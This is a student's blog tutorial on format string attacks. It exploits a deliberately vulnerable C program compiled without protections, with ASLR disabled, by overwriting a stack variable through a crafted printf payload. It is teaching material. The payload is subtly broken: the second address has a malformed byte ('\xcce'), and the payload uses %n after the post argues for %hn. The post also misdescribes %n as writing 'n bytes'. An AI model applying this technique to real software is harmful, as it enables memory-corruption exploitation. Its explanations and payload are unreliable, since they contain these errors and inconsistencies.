A brief background
As I was a software developer, one of my focused interests in cybersecurity are software security. In my post-graduate studies, one of the earliest attacks on software memory bugs introduced to me was buffer overflow (of course) and format string attack.
Buffer overflow is fairly easy to understand. It was format string attack that caused me to pull my hair. My understanding for format string was as horrible as my half-baked French! Je ne comprends pas!!! Unfortunately, one of my recent assignments required me to use format string attack to open a shell. I was determined to do well for my assignments, so I decided to try and improve my understanding on format string attack. I learnt a lot in the process and I wanted to share my learning process here. Let's hope that this will benefit you if you have any issue with format string attack, particularly with your assignments.
First of all, I do not want to go through the basic of format string attack again. This has been sufficiently explained in various papers and websites. But to get everyone started, these are the main references that I used in my learning (and recent assignment).
References:
Reference 1: Format String Exploitation-Tutorial by Saif El-Sherei
I believed that this is one of the most referred materials online when it comes to format string attack. It is simple enough to understand.
Reference 2: Exploit 101 - Format Strings by Alexandre CHERON
This article really helped me understand how to use %n
and %hn
, which were the main stumbling blocks in my understanding to format string attack. While the examples in reference 1 were more relevant to my assignments, it was this article that gave me the knowledge to understand what was going on.
The big deal?
As I mentioned above, %n
and %hn
were confusing to me. I knew, in basic, how format string attacks work. Basically, the vulnerability happens when you forgot to put arguments for the format specifiers when using printf, snprintf, etc. Without the arguments, these functions will just be reading off the stack like nobody's business. A big no-no if you hold important information in the stack. Remember, local variables are held in the stack. So if even if you are just storing, say password, in a local variable temporarily, it can still be read by a format string attack.
Ok, let us start looking at the examples. Note that all my examples are performed on Kali Linux. (Note: I learn best with examples and following them)
The code
So let's look at this code from my reference 2:
Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
int target = 0xdeadc0de;
char buffer[64];
fgets(buffer, 64, stdin);
printf(buffer);
if(target == 0xcafebabe) {
printf("Good job !\n");
return EXIT_SUCCESS;
} else {
printf("Nope...\n");
exit(EXIT_FAILURE);
}
}
The setup
First of all, let us disable ASLR.
sudo su
echo 0 > /proc/sys/kernel/randomize_va_space
I am also using GEF as well. Pretty nifty tool for GDB, to be honest. Of course we have PEDA but what's the point of writing this if I am doing the same thing as Mr Cheron? In case if you wonder, I set my stack lines in GEF to 100 and set the stack to display downwards. This is more inline with what I was taught in class, where stack grows downward.
gef config context.nb_lines_stack 100
gef config context.grow_stack_down true
gef save
The code is compiled using gcc:
gcc -z execstack -z norelro -fno-stack-protector -o format1 format1.c -m32 -g
After setting breakpoint at main and step to line 13:
In my Kali machine, target (0xdeadc0de)
is located at 0xffffcfcc
. Basically the exercise required me to write that value to 0xcafebabe
.
The Stack (in my own words)
For most systems (at least I know Linux does), the stack grows downwards. When we initialise a local variable, it will store the variable in the next lower address. For example, if target
is stored in 0xffff0048
, then buffer
will be 0xffff0048
- 0x40 = 0xffff0008
.
In my screenshots, we know that target
is located at 0xffffcfcc
. Since buffer
is 64 bytes (0x40), it should resides in 0xffffcf8c
. This is probably not significant here, but it is good to know and helps me understand the stack better.
%n and its siblings
After reading much references and articles, I finally understood what %n
does:
Similarly to %x
, %s
or %p
, when there is a %n
, it will write n bytes to the argument corresponding to its position. In the illustration above, it will write x into i.
So what if we have multiple %n
? The illustration below should tell the story better, based on the explanation above.
But what if we do not specify the arguments? The behaviour will still be same as %x
.
One issue is %n
writes 4 bytes to the address. Which means if I want to write 0xcafebabe into target, I will need to write a lot of bytes in printf
in order for me to write it into target
. Instead of %n
, we can use %hn
and %hhn
which write 2 bytes and 1 byte respectively. If I were to use %hn
, I will need to specify 2 addresses instead of 1.
Translating it to my example, it will be cfcc
and cfce
.
The format string
So my final format string will be something like:
<address1><address1 + 2bytes><X bytes to make it to 0xbabe>%7$n<Y bytes to make it to 0xcafe>%8$n
address1 = \xcc\xcf\xff\xff
address2 = \xcce\xcf\xff\xff
X = 0xbabe - 8 = 47798
Y = 0xcafe - 0xbabe = 4160
Full format string will be
"\xcc\xcf\xff\xff\xcce\xcf\xff\xff%47798x%7$n%4160x%8$n"
Note: address1 and address2 will be different depending on your setup.
Final thoughts
This is my first tech blog since over 15 years. I am glad that I am able to write something out first. Obviously this is not finished as I will go in depth on what I was asked to do for my assignment. The above served as my "weapons" to handle the upcoming task.
Thank you for being a good audience for reaching this point. Do feel free to leave your comments. _Au revoir~ A bientot!
_
Top comments (0)